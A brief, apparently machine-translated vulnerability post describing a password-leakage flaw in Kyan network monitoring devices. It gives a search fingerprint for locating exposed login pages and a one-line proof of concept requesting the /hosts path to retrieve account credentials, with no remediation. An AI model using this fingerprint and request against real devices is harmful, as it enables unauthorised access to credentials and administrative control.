Post

Kyan Network Monitoring Equipment Hosts Account Password Leakage Vulnerability

Kyan Network Monitoring Equipment Hosts Account Password Leakage Vulnerability

Kyan Network Monitoring Equipment Hosts Account Password Leakage Vulnerability

Vulnerability Description

Kyan Network Monitoring Device There is an account password leakage vulnerability, and attackers can obtain account password and background permissions through the vulnerability.

Vulnerability Impact

Kyan

Network surveying and mapping

title=”platform - Login”

Vulnerability reappears

The login page is as follows

img

POC

https://xxx.xxx.xxx.xxx/hosts

img

Successfully obtained the account password

This post is licensed under CC BY 4.0 by the author.